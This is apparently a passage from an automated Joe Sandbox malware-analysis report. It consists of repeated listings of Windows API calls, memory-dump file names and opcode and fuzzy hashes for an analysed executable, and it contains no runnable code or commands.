          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
          • String ID:
          • API String ID: 3985565216-0
          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
          APIs
          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
          • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
          • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
          • __wsplitpath.LIBCMT ref: 00433E6D
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • _wcscat.LIBCMT ref: 00433E80
          • __wcsicoll.LIBCMT ref: 00433E90
          • CloseHandle.KERNEL32(00000000), ref: 00433EC8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
          • String ID:
          • API String ID: 135935984-0
          • Opcode ID: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
          • Instruction ID: 66738fc5919b7c3a3c7c4a311c48fd84e22d6c2a66b6279363cc5d51ef299119
          • Opcode Fuzzy Hash: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
          • Instruction Fuzzy Hash: 832180B6500118AFDB11CF90CD85EEEB379EB8C700F10459AFA0997150DA75AA85CBA4
          APIs
          • _malloc.LIBCMT ref: 0041F707
            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
          • _free.LIBCMT ref: 0041F71A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AllocateHeap_free_malloc
          • String ID: [B
          • API String ID: 1020059152-632041663
          • Opcode ID: e13f26c2c34eb78c02f58f7f8316b4d17de41860fd6a4a2d9b5964bf6ac8b4d9
          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
          • Opcode Fuzzy Hash: e13f26c2c34eb78c02f58f7f8316b4d17de41860fd6a4a2d9b5964bf6ac8b4d9
          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
          • __calloc_crt.LIBCMT ref: 00413DB0
          • __getptd.LIBCMT ref: 00413DBD
          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
          • _free.LIBCMT ref: 00413E07
          • __dosmaperr.LIBCMT ref: 00413E12
            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
          • String ID:
          • API String ID: 155776804-0
          • Opcode ID: d8bd7f093b918739defc3710cfbf81fcd4ab18eacad6c28b3af39ac96f36a73f
          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
          • Opcode Fuzzy Hash: d8bd7f093b918739defc3710cfbf81fcd4ab18eacad6c28b3af39ac96f36a73f
          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
          APIs
            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
          • DuplicateHandle.KERNEL32 ref: 00436C9A
          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
          • DuplicateHandle.KERNEL32 ref: 00436CB2
          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
          • String ID:
          • API String ID: 1957940570-0
          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 00413D20
            • Part of subcall function 004178AE: TlsGetValue.KERNEL32 ref: 004178B7
            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
            • Part of subcall function 0041788E: TlsGetValue.KERNEL32 ref: 0041789C
          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
          • ExitThread.KERNEL32 ref: 00413D4E
          • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00413D54
          • __freefls@4.LIBCMT ref: 00413D74
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
          • String ID:
          • API String ID: 259663610-0
          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Rect$Client$Window$MetricsScreenSystem
          • String ID:
          • API String ID: 3220332590-0
          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _malloc_wcslen$_strcat_wcscpy
          • String ID:
          • API String ID: 1612042205-0
          • Opcode ID: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
          • Opcode Fuzzy Hash: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
          APIs
          • GetKeyboardState.USER32(?), ref: 0044C570
          • SetKeyboardState.USER32(00000080), ref: 0044C594
          • PostMessageW.USER32 ref: 0044C5D5
          • PostMessageW.USER32 ref: 0044C60D
          • PostMessageW.USER32 ref: 0044C62F
          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePost$KeyboardState$InputSend
          • String ID:
          • API String ID: 2221674350-0
          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscpy$_wcscat
          • String ID:
          • API String ID: 2037614760-0
          • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
          • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
          APIs
          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
          • VariantClear.OLEAUT32(?), ref: 00451CA1
          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Copy$AllocClearErrorLastString
          • String ID:
          • API String ID: 960795272-0
          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
          APIs
          • BeginPaint.USER32(00000000,?), ref: 00447BDF
          • GetWindowRect.USER32(?,?), ref: 00447C5D
          • ScreenToClient.USER32(?,?), ref: 00447C7B
          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
          • EndPaint.USER32(?,?), ref: 00447D13
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
          • String ID:
          • API String ID: 4189319755-0
          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
          APIs
          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
          • InvalidateRect.USER32(?,00000000,00000001), ref: 004490C9
          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
          • SetWindowLongW.USER32 ref: 004490E1
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$LongWindow$InvalidateRect
          • String ID:
          • API String ID: 1976402638-0
          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
          APIs
          • ShowWindow.USER32(?,00000000), ref: 00440A8A
          • EnableWindow.USER32(?,00000000), ref: 00440AAF
          • ShowWindow.USER32(?,00000000), ref: 00440B18
          • ShowWindow.USER32(?,00000004), ref: 00440B2B
          • EnableWindow.USER32(?,00000001), ref: 00440B50
          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Show$Enable$MessageSend
          • String ID:
          • API String ID: 642888154-0
          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Copy$ClearErrorLast
          • String ID: NULL Pointer assignment$Not an Object type
          • API String ID: 2487901850-572801152
          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
          APIs
          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
          • EnableWindow.USER32(?,00000000), ref: 00448B5C
          • EnableWindow.USER32(?,00000001), ref: 00448B72
          • ShowWindow.USER32(?,00000000), ref: 00448BE8
          • ShowWindow.USER32(?,00000004), ref: 00448BF4
          • EnableWindow.USER32(?,00000001), ref: 00448C09
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Enable$Show$MessageSend
          • String ID:
          • API String ID: 1871949834-0
          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
